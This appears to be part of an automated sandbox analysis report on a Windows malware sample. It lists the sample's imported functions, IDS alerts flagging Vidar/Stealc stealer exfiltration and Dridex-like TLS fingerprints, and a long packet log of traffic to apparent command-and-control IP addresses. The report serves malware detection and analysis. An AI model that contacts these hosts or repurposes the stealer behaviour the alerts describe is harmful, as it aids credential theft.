                                                                                      USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                      SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                      ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                      VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                                                      2024-08-29T20:49:45.709612+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359952443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:55.420274+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359957443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:22.722325+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359938443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:27.286287+0200TCP2044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config14435994194.130.188.148192.168.2.5
                                                                                      2024-08-29T20:50:03.661659+0200TCP2054495ET MALWARE Vidar Stealer Form Exfil15996180192.168.2.595.164.119.162
                                                                                      2024-08-29T20:49:29.365044+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359943443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:52.374206+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359955443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:34.489806+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359945443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:51.411352+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359954443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:50:01.060380+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359960443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:27.945326+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359942443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:23.881214+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359939443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:26.574584+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359941443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:30.969182+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359944443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:37.787326+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359948443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:58.900576+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359959443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:42.053985+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359950443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:36.478659+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359947443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:56.817977+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359958443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:47.284094+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359953443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:25.234179+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359940443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:35.389430+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359946443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:28.638207+0200TCP2049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST159942443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:28.638383+0200TCP2051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M114435994294.130.188.148192.168.2.5
                                                                                      2024-08-29T20:49:39.983960+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359949443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:43.989360+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359951443192.168.2.594.130.188.148
                                                                                      2024-08-29T20:49:53.730356+0200TCP2028765ET JA3 Hash - [Abuse.ch] Possible Dridex359956443192.168.2.594.130.188.148

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Aug 29, 2024 20:49:20.485718012 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:20.485752106 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:20.485836029 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:20.494496107 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:20.494508028 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.139749050 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.139816999 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.139843941 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.188179970 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.188190937 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.188561916 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.188615084 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.192256927 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.236500978 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.623123884 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.623142004 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.623192072 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.623255968 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.623270988 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.623301029 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.623327017 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.708765030 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.708803892 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.708825111 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.708834887 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.708861113 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.708867073 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.723705053 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.723747015 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.723764896 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.723784924 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.723828077 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.724296093 CEST59937443192.168.2.523.197.127.21
                                                                                      Aug 29, 2024 20:49:21.724308968 CEST4435993723.197.127.21192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.735778093 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:21.735814095 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:21.735908985 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:21.736304998 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:21.736319065 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:22.722225904 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:22.722325087 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:22.725788116 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:22.725801945 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:22.726002932 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:22.726058960 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:22.726350069 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:22.772510052 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.205702066 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.205746889 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.205789089 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.205935001 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.208777905 CEST59938443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.208795071 CEST4435993894.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.210591078 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.210623026 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.210690975 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.210911036 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.210925102 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.881153107 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.881213903 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.881709099 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.881716967 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:23.883277893 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:23.883284092 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:24.577430964 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:24.577480078 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.577487946 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:24.577531099 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.577733994 CEST59939443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.577753067 CEST4435993994.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:24.579128981 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.579189062 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:24.579276085 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.579479933 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:24.579495907 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.233916044 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.234179020 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.234532118 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.234543085 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.236238003 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.236252069 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.896909952 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.896924973 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.896979094 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.896996021 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.897034883 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.897294044 CEST59940443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.897310972 CEST4435994094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.898679018 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.898713112 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:25.898789883 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.899033070 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:25.899048090 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:26.574374914 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:26.574584007 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:26.575002909 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:26.575015068 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:26.576664925 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:26.576673031 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.286048889 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.286065102 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.286108971 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.286118984 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.286138058 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.286168098 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.286531925 CEST59941443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.286556005 CEST4435994194.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.287928104 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.287956953 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.288028002 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.288230896 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.288247108 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.945266962 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.945326090 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.945729971 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.945745945 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:27.947491884 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:27.947498083 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:28.638220072 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:28.638298035 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:28.638407946 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.638407946 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.638602018 CEST59942443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.638631105 CEST4435994294.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:28.695274115 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.695332050 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:28.695419073 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.695630074 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:28.695647001 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:29.364916086 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:29.365044117 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:29.365632057 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:29.365643978 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:29.367257118 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:29.367261887 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:29.367309093 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:29.367319107 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.148149014 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.148216963 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.148436069 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307060003 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307116032 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.307282925 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307430029 CEST59943443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307439089 CEST4435994394.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.307728052 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.307742119 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.969070911 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.969182014 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.969788074 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.969799042 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:30.971662998 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:30.971669912 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440427065 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440447092 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440494061 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440506935 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440535069 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440550089 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440550089 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440556049 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.440587044 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.440587044 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471681118 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471694946 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471739054 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471749067 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.471775055 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.471784115 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.538400888 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538420916 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538511038 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.538536072 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.538583040 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.569622040 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569642067 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569731951 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.569766045 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.569809914 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.608186007 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608201981 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608300924 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.608310938 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.608352900 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.633101940 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633130074 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633218050 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.633228064 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.633287907 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.656523943 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656541109 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656626940 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.656640053 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.656682968 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.667865992 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667882919 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667948961 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.667959929 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.667998075 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.685590029 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685606956 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685693979 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.685702085 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.685739994 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.703294992 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703309059 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703388929 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.703397036 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.703439951 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.717611074 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717626095 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717706919 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.717713118 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.717751980 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.735733032 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735748053 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735841990 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.735848904 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.735908985 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.747674942 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747689962 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747771978 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.747778893 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.747819901 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.756047964 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756062984 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756129980 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.756138086 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.756172895 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.765659094 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765674114 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765733004 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.765741110 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.765774012 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.782778025 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782793045 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782852888 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.782861948 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.782898903 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.785614014 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785628080 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785696030 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.785703897 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.785742998 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.791790009 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791804075 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791882992 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.791896105 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.791932106 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.806210041 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806224108 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806287050 CEST59944443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:49:31.806294918 CEST4435994494.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:49:31.806333065 CEST59944443192.168.2.594.130.188.148
